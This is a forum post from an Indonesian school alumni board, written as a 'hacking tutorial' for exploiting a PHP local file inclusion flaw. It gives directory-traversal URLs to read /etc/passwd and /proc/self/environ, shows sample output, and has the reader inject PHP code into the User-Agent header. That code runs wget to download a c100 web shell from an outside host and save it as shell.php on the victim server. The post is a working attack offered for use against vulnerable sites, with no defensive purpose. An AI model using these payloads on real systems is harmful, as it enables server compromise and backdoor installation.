FORUM SMP 1 WONOSARI

Would you like to react to this message? Create an account in a few clicks or log in to continue.
FORUM SMP 1 WONOSARI

=> Ini adalah forum untuk murid-murid maupun alumni SMP 1 WONOSARI ! Yang mau mengenang atau berbagi cerita bisa di forum ini ! Ramein Yuk ! <=


    Tutorial Hacking

    Admin
    Admin
    Senior


    Jumlah posting : 81
    Reputation : 0
    Join date : 07.04.10
    Age : 28
    Lokasi : Gunungkidul

    Tutorial Hacking Empty Tutorial Hacking

    Post by Admin Sun 11 Apr 2010 - 3:55

    Tutorial Hacking Hypervm-hacking

    Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas sebelumnya di website milw0rm pada paper ke 361.
    Ok kita langsung saja…

    1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

    contoh : http://site.com/info.php?file=news.php

    2. coba kita ganti “news.php” dengan “../../../”.

    contoh : http://site.com/info.php?file=../../../

    lalu kita mendapat error, seperti berikut…

    Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

    ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
    selanjutanya kita coba temukan /etc/passwd.

    contoh : http://site.com/info.php?file=etc/passwd
    Tetapi kita masih mendapat error seperti berikut :

    Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

    bagaimana jika kita naikan directorynya ?
    mari kita coba…

    contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

    Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

    root❌0:0:root:/root:/bin/bash
    daemon❌1:1:daemon:/usr/sbin:/bin/sh
    bin❌2:2:bin:/bin:/bin/sh
    sys❌3:3:sys:/dev:/bin/sh
    sync❌4:65534:sync:/bin:/bin/sync
    games❌5:60:games:/usr/games:/bin/sh
    man❌6:12:man:/var/cache/man:/bin/sh
    lp❌7:7:lp:/var/spool/lpd:/bin/sh
    mail❌8:8:mail:/var/mail:/bin/sh
    news❌9:9:news:/var/spool/news:/bin/sh
    uucp❌10:10:uucp:/var/spool/uucp:/bin/sh
    proxy❌13:13:proxy:/bin:/bin/sh
    www-data❌33:33:www-data:/var/www:/bin/sh
    backup❌34:34:backup:/var/backups:/bin/sh
    list❌38:38:Mailing List Manager:/var/list:/bin/sh
    irc❌39:39:ircd:/var/run/ircd:/bin/sh
    gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody❌65534:65534:nobody:/nonexistent:/bin/sh
    libuuid❌100:101::/var/lib/libuuid:/bin/sh
    syslog❌101:102::/home/syslog:/bin/false
    klog❌102:103::/home/klog:/bin/false
    hplip❌103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    avahi-autoipd❌104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    gdm❌105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
    saned❌106:113::/home/saned:/bin/false
    pulse❌107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    messagebus❌108:117::/var/run/dbus:/bin/false
    polkituser❌109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
    avahi❌110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    haldaemon❌111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
    gunslinger❌1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
    snmp❌112:65534::/var/lib/snmp:/bin/false
    guest❌113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
    sshd❌114:65534::/var/run/sshd:/usr/sbin/nologin

    3. mari kita check apakah /proc/self/environ bisa kita akses ?
    sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

    contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

    Jika anda mendapatkan yang seperti ini :

    DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
    application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
    image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
    HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
    HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
    PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
    REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
    REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
    SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
    SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
    SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
    Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
    PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

    Ternyata proc/self/environ dapat kita akses !
    jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

    4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
    dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
    buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
    lalu pada user-agent isikan dengan kode berikut :

    <?system(’wget http://r57.gen.tr/c100.txt -O shell.php’);?>

    atau

    <?exec(’wget http://r57.gen.tr/c100.txt -O shell.php’);?>

    lalu submit.

    5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

    http://www.site.com/shell.php
    happy hacking !

      Waktu sekarang Mon 13 May 2024 - 5:32